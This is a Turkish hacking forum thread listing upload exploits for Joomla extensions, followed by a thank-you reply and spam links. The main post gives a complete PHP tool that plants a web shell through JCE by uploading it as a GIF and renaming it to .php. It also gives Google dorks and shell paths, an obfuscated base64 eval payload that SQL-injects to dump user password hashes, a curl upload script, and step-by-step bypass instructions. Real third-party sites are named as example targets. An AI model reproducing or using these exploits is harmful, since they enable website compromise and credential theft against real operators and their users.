Joomla Upload Açıkları

R

RujAjan

Özel Üye
Katılım
28 Eki 2012
Mesajlar
2,486
Tepkime puanı
1
Puanları
0
Joomla JCE 2.0.10 Shell Upload Exploit
Kod: 
<?php
 
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
 
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
 
<body bgcolor="#00000">
 
<p align="center"><font size="4" color="#00ff00">JCE Joomla Extension Remote File Upload</font></p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data"  method="post">
<p></font><font color="#00ff00" > hostname (ex:www.sitename.com):    </font><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
<p></font><font color="#00ff00" > path (ex: /joomla/ or just / ):            </font><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
<p></font><font color="#00ff00" >Please specify a file to upload:           </font><input type="file" name="datafile" size="40"><font color="#FF0000"> * </font>
<p><font color="#00ff00" >  specify a port (default is 80):             </font><input name="port" size="20"><span class="Stile5"></span></p>
<p><font color="#00ff00" >  Proxy (ip:port):                                 </font><input name="proxy" size="20"><span class="Stile5"></span></p>
<p align="center"> <span class="Stile5"><font color="#FF0000">* </font><font color="white" >fields are required</font></font></span></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form>
</td>
</tr>
</tbody>
</table>
</body></html>';
 
function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
global $proxy, $host, $port, $html, $user, $pass;
if ($proxy == '')
{
$ock = fsockopen($host,$port);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo '<font color=white> No response from '.htmlentities($host).' ...<br></font>';
die;
}
} else
{
$parts = explode(':',$proxy);
echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>';
$ock   = fsockopen($parts[0],$parts[1]);
stream_set_timeout($ock, 5);
if (!$ock) 
{
echo '<font color=white>No response from proxy...<br></font>';
die;
}
}
 
fputs($ock,$packet);
if ($response == 1)
{
if ($proxy == '')
{
$html = '';
while (!feof($ock))
{
$html .= fgets($ock);
}
} else
{
$html = '';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html .= fread($ock,1);
}
}
} else $html = '';
 
fclose($ock);
if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
if ($s==1){
$count=0;
$res=nl2br(htmlentities($html));
$str = array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
foreach ($str as $value){
$pos = strpos($res, $value);
if ($pos === false) {
$count=$count++;
} else {
echo "<font color=white>Target patched.<br/><br/></font>";
die();
}
}
if ($count=10) echo '<font color=white>Target is exploitable.<br/><br/></font>';
}
}
 
$host   = $_POST['host'];
$path   = $_POST['path'];
$port   = $_POST['port']; 
$proxy   = $_POST['proxy']; 
 
if (isset($_POST['Submit']) && $host != '' && $path != '')
{
 
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('<font color=white>Error... check the path!</font>');}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
 
 
/* Packet 1 --> Checking Exploitability */
$packet  = "GET ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
 
sendpacket($packet,1,0,1);
 
/* Packet 2 --> Uploading shell as a gif file */
 
$content = "GIF89a1\n";
$content .= file_get_contents($_FILES['datafile']['tmp_name']);
$data    = "-----------------------------41184676334\r\n";
$data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data   .= "/\r\n";
$data   .= "-----------------------------41184676334\r\n";
$data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data   .= "-----------------------------41184676334\r\n";
$data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data   .= "0\r\n";
$data   .= "-----------------------------41184676334\r\n";
$data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n";
$data   .= "Content-Type: image/gif\r\n\r\n";
$data   .= "$content\r\n";
$data   .= "-----------------------------41184676334\r\n";
$data   .= "0day\r\n";
$data   .= "-----------------------------41184676334\r\n";
$data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data   .= "upload\r\n";
$data   .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
$packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
$packet .= $data;
 
sendpacket($packet,0,0,0);
 
/* Packet 3 --> Change Extension from .gif to .php */
 
 
$packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "X-Request: JSON\r\n";
$packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
$ren ="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}";
$packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
$packet .= $ren."\r\n\r\n";
 
sendpacket($packet,1,0,0);
 
/* Packet 4 --> Check for successfully uploaded */
 
 
$packet  = "Head ".$p."/images/stories/0day.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
 
sendpacket($packet,1,0,0);
 
if(stristr($html , '200 OK') != true)
{echo "<font color=white>Exploit Faild...</font>";} else echo "<font color=white>Exploit Succeeded...<br>http://$host:$port$path"."/images/stories/0day.php</font>";
}
?>
Kod: 
Google dork: "inurl:com_autostand"
--------------------------
localhost/path/index.php?option=com_autostand&func=newItem
--------------------------
localhost/path/images/autostand/images/shell.php
--------------------------
örnek:http://www.maxoverdrive.ca//index.php?option=com_autostand&func=newItem
Kod: 
Google dork: "inurl:com_garyscookbook"
--------------------------
localhost/path/index.php?option=com_garyscookbook&func=newItem
--------------------------
localhost/path/components/com_garyscookbook/img_pictures/shell.php
Kod: 
Google dork: inurl:index.php?option=com_joomla_flash_uploader 

http://localhost/index.php?option=com_joomla_flash_uploader&Itemid=[id]

Yada

 http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf

 Shell.php veya shell.php.jpg
 
4 example ==> Upload folder: ./images/stories/ ==> Your shell => http://localhost//images/stories/shell.php

Örnek : http://www.coachforexcellence.co.uk/index.php?option=com_joomla_flash_uploader&Itemid=98

Joomla Component com_spidercalendar Remote Exploit
Kod: 
<script><!--
document.write(unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3ESpider%20Calendar%20Joomla%20Exploit%3C/title%3E%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Diso-8859-1%22%3E%3Cstyle%20type%3D%22text/css%22%3E%0A%3C%21--%0Abody%2Ctd%2Cth%20%7B%0A%09color%3A%20%23FF0000%3B%0A%7D%0Abody%20%7B%0A%09background-color%3A%20%23000000%3B%0A%7D%0A--%3E%0A%3C/style%3E%3C/head%3E%0A%0A%3Cbody%3E%3Cbr%3E%0A%3Cbr%3E%3Ccenter%3E%0A%3Cimg%20src%3D%22http%3A//a4.sphotos.ak.fbcdn.net/hphotos-ak-ash3/553280_444893268875730_721348140_n.jpg%22%20width%3D%22125%22%20height%3D%22109%22%20align%3D%22middle%22%20longdesc%3D%22Posion%20Security%20%22%3E%3Cbr%3E%3C/center%3E%0A%3Cdiv%20align%3D%22center%22%3E%3Cbr%3E%0A%20%20%3Ca%20href%3D%22https%3A//poisonsecurity.wordpress.com%22%3EPoison%20Securtity%3C/a%3E%20%3Cbr%3E%0A%20%20Joomla%20Spider%20Calendar%20Remote%20Sql%20Exploit%0A%20%3Cbr%3E%0A%20%20%3Cbr%3E%0A%20%20%0A%3C/div%3E%0A%3Cform%20action%3D%22%3Faction%3Dexploit%22%20METHOD%3D%22post%22%3E%0A%3Ctable%20border%3D0%3E%0A%3Ctr%3E%0A%3Ctd%3EIngrese%20La%20url%20del%20Sitio%20%3C/td%3E%0A%3Ctd%3E%3Cinput%20type%3D%22text%22%20name%3D%22url%22/%3E%3C/td%3E%3Ctd%3E%3Cinput%20type%3D%22submit%22%20name%3D%22launch%22/%3E%3C/td%3E%0A%3C/tr%3E%0A%3C/table%3E%0AUso%20%20http%3A//127.0.0.1/path/%3Cbr%3E%0APosible%20dork%3A%20inurl%3Acom_spidercalendar%3Cbr%3E%0A%3Cbr%3E%20%0A%3C/form%3E%0A%3C/body%3E%0A%0A%3C/html%3E"));
//--></script><?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYoJF9HRVRbJ2FjdGlvbiddPT0nZXhwbG9pdCcpDQp7DQokcmVzdWx0YWRvPWZpbGVfZ2V0X2NvbnRlbnRzKCRfUE9TVFsndXJsJ10uIi9pbmRleC5waHA/b3B0aW9uPWNvbV9zcGlkZXJjYWxlbmRhciZkYXRlPTk5OTk5OS45JTI3JTIwdW5pb24lMjBhbGwlMjBzZWxlY3QlMjBudWxsJTJDbnVsbCUyQ2NvbmNhdCUyODB4M0QzRDNEM0QzRCx1c2VybmFtZSwweDNELHBhc3N3b3JkLDB4M0QzRDNEM0QzRCUyOSUyQ251bGwlMkNudWxsJTJDbnVsbCUyMGZyb20lMjBqb3NfdXNlcnMrLS0rJTIwRDROQjRSIik7DQokcGFydGVzPWV4cGxvZGUoIj09PT09IiwkcmVzdWx0YWRvKTsNCmVjaG8gJHBhcnRlc1sxXTsNCn1lbHNlew0KZWNobyAiSW5ncmVzZSBVcmwiOw0KfQ0KLy9ENE5CNFIgMjAxMg0KLypTaSB1c3RlZCBlc3RhIGxleWVuZG8gZXN0ZSBtZW5zYWplIGxvIGZlbGljaXRvIHBvciBxdWUgc2lnbmlmaWNhIHF1ZSBubyBsZSBiYXN0YSBzb2xvIGNvbiBxdWUgbGUgZGUgbGEgY2xhdmUsIHNpIG5vIHF1ZSB1c3RlZCBxdWllcmUgc2FiZXIgZWwgcG9ycXVlIGRhIGxhIGNsYXZlLCBhdW5xdWUgZXMgYWxnbyB0YW4gc2ltcGxlIGVzbyBsbyBoYWNlIGRpZmVyZW50ZSBkZSBtdWNob3MsIG1pIGFtaWdvIF84NGt1cjEwXyB5IHlvIEQ0TkI0UiBsZSBzYWx1ZGFtb3MqLw=="));
?>
Kod: 
Joomla Component com_agileplmform file upload vulnerability
Google Dork: inurl:components/com_agileplmform

<?php
/* example of using
$uploadfile="C:\AppServ\www\Tunisia.php"; */
$uploadfile="C:\AppServ\www\b.php";
$ch = curl_init("http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_agileplmform/views/agileplmform/js/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
[+] how TO use
Tunisia.php must be the devil file 3:)
!!!shell!!!
TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/
Filename : $postResult output

Kod: 
Joomla Component com_ksadvertiser Remote File & Bypass Upload Vulnerability
Google Dork: inurl:index.php?option=com_ksadvertiser

1.  Some pages require the Register
Registrese Algunas Paginas lo exigen
 
http://site/index.php?option=com_user&view=login
 
 
2.  Go to the upload path
Dirijase a la ruta del upload
 
 
http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
 
 
3.  Go to images and give click to upload, browse your file shell.php, and rename it to shell.php.gif
Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif
 
4.  Locate your file in the root / images/ksadvertiser/U0 -> this may vary
Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar
 
http://site/images/ksadvertiser/U0/403.php.gif
 
 
Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
 
CyberNova

CyberNova

Yeni Üye
Katılım
23 Eyl 2012
Mesajlar
92
Tepkime puanı
0
Puanları
0
Eyvallah sağolasın
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012